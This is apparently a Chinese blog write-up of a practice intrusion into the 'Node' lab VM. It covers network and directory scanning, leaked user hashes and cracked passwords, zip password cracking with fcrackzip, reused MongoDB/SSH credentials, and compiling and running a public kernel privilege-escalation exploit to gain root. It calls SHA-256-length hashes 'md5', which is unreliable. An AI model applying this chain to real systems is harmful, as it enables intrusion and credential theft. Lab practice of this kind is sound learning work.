只是一次练习.

Node 靶机练习

环境

  • 靶机名: Ubuntu 16.04.3 TLS node tty1
  • 运行环境: Vmware virtual machine

过程

  • 扫描内网
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    C:\Users\MECHREVO>nmap -sP 192.168.126.0/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 11:38 ?D1ú±ê×?ê±??
    Stats: 0:00:13 elapsed; 0 hosts completed (0 up), 254 undergoing ARP Ping Scan
    Parallel DNS resolution of 254 hosts. Timing: About 50.00% done; ETC: 11:38 (0:00:00 remaining)
    Stats: 0:00:18 elapsed; 0 hosts completed (0 up), 254 undergoing ARP Ping Scan
    Parallel DNS resolution of 254 hosts. Timing: About 50.00% done; ETC: 11:38 (0:00:05 remaining)
    Nmap scan report for 192.168.126.134 (192.168.126.134)
    Host is up (0.00s latency).
    MAC Address: 00:0C:29:F3:9B:1C (VMware)
    Nmap scan report for 192.168.126.254 (192.168.126.254)
    Host is up (0.00s latency).
    MAC Address: 00:50:56:FF:09:F7 (VMware)
    Nmap scan report for 192.168.126.1 (192.168.126.1)
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 24.61 seconds

找到靶机ip地址: 192.168.126.134

  • 扫描端口
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    C:\Users\MECHREVO>nmap -A -p- 192.168.126.134
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 11:51 ?D1ú±ê×?ê±??
    Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 41.55% done; ETC: 11:54 (0:01:16 remaining)
    Nmap scan report for 192.168.126.134 (192.168.126.134)
    Host is up (0.00028s latency).
    Not shown: 65533 filtered ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
    | 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
    |_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
    3000/tcp open http Node.js Express framework
    | hadoop-datanode-info:
    |_ Logs: /login
    | hadoop-tasktracker-info:
    |_ Logs: /login
    |_http-title: MyPlace
    MAC Address: 00:0C:29:F3:9B:1C (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT ADDRESS
    1 0.28 ms 192.168.126.134 (192.168.126.134)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 134.81 seconds

开放了两个端口: 22 和 3000, 22端口是ssh端口, 3000端口就是node.js的默认端口.

用浏览器访问192.168.126.134:3000.
抓包看看, 好像没有什么可疑的地方.

尝试扫描目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
D:\dirsearch>python dirsearch.py -u http://192.168.126.134:3000/ -e *

_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6087

Error Log: D:\学习资料\Python——为了守护我爱的人,我将运行一个牛逼的脚本\dirsearch\logs\errors-19-07-26_12-04-21.log

Target: http://192.168.126.134:3000/

[12:04:21] Starting:
[12:04:38] 301 - 171B - /assets -> /assets/
[12:05:16] 301 - 173B - /uploads -> /uploads/

Task Completed

分别看下两个目录, 里面都是些网站上的资源. 没有有价值的东西.

  • 通过查看/api/users/latest, 找到了三个账号.
    1
    2
    3
    4
    5
    6
    [{"_id":"59a7368398aa325cc03ee51d","username":"tom",
    "password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
    {"_id":"59a7368e98aa325cc03ee51e","username":"mark",
    "password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
    {"_id":"59aa9781cced6f1d1490fce9","username":"rastating",
    "password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]

其中的密码经md5加密, 且最后一个无法破解.

但是只要有一个账号就可以了.

md5_decode('f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240') => spongebob
登录进tom的账号后. 发现没有管理员权限, 还是啥也干不了…

网上查了一下攻略, 此处应该访问/api/users/

1
2
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT",
"password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}]

密码md5解密
md5_decode('dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af') => 'manchester'

这下有了admin账号了.

登录后可以下载网站源码MyPlace.backup.

但是确实base64编码的. 我尝试用网上的在线解码网站, 但是效果不理想.

其实直接用php就可以很方便的解码并保存在文件中, 如下

1
2
3
$file = " /* base64 编码的文件内容 */ ";
$result = base64_decode($file);
file_put_contents("result.txt",$result);

解码之后打开一看是乱码, 但是前两个字符是’PK’, 所以应该是个zip压缩文件. 只要把上面的result.txt直接改成result.zip再跑一下就可以.

压缩包需要密码, 还需要研究下zip的密码破解.


小插曲

刚才午睡的时候, 我回到了高中的时光,

我梦见了一个让我心动的, 但又陌生的姑娘在我的班上,

她在哭, 哭的很伤心, 在自己的座位上,

我很想安慰她, 但

我只是一次又一次的经过她,

不敢和她说话, 不敢递给她一张纸巾,

她是那么无助, 我也无能为力,

直到梦醒, 我都不知道她的名字,

也许, 我再也遇不见她了吧…


网上有很多在线破解压缩文件密码的网站, 可基本都是要钱的…

Windows下的一个破解工具—-Password Unlocker, 亲测不好用, 建议避雷.

可以用kali中的一个工具fcrackzip来进行破解.

1
fcrackzip -v -b -u -c a -p magicaaaa myplace
  • -v : 详细信息
  • -b : 爆破
  • -u : 指定zip压缩格式(大概)
  • -c : 指定密码类型, 选项值 a 就是纯字符串, 1 就是纯数字, a1 就是数字和字符串混杂.
  • -p : 指定密码, magicaaaa就是前五位确定是magic了, 后面的a在这里是掩码, 表明这4位是字母.
  • myplace : 要破解的压缩包的名称.

上面的是遍历爆破, 效率估计不高, gxy学长告诉了我fcrackzip也支持跑字典,

1
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip

其中的这个 rockyou.txt 估计以后也能用到.

最后得到密码 magicword

解压缩后, myplace里是用node.js框架搭建的网站源码(终于知道靶机名字的由来了.)

然后我对node.js也不是很熟悉, 在百度中了解到, 这个框架的项目入口和程序启动文件是app.js.

打开一看, 里面有个连接MongoDB的账户和密码.
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

顺便了解了一下, MongoDB和Mysql差不多, 都是数据库管理系统, 只是类型有所不同.

奇怪的是, 这个数据库的账号和密码和linxu的账号和密码是相同的, 我们可以直接ssh登录进靶机的系统了.(这或许也是个套路, 以后可以尝试)

进入到web目录下, 整个目录的权限都在root那里, 我们没法写文件, 自然也没法留后门. 下面需要对ubuntu进行提权.

首先查看系统信息.

1
2
mark@node:/var/www/myplace$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

在 kali msfconsole 中查找相关的漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
searchsploit Ubuntu 16.04
[*] exec: searchsploit Ubuntu 16.04

--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 S | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privi | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

使用local Privilege Escalation来进行提权.

1
scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.6.128:/tmp/

(tmp对权限的限制较少, 所以复制到这个目录下).
执行命令后, 目录中已经多了这个c源文件, 还需要编译才能成为可以运行的exp

1
gcc -pthread 44298.c -o exp -lcrypt

这里有个两个陌生的命令选项

  • -pthread, 百度了下, 有了这个选项后, 编译器在编译时会选择线程安全的实现, 具体的咱也别管了, 反正先加上就好…
  • -lcrypt, 这里-l是选项, crypt是参数值. 表示链接时搜索名为crypt的库.

编译后出现了个exp, 运行后, 我们已经是root了.

下面要学习下如何在node.js网站框架留下后门.

(未完待续…)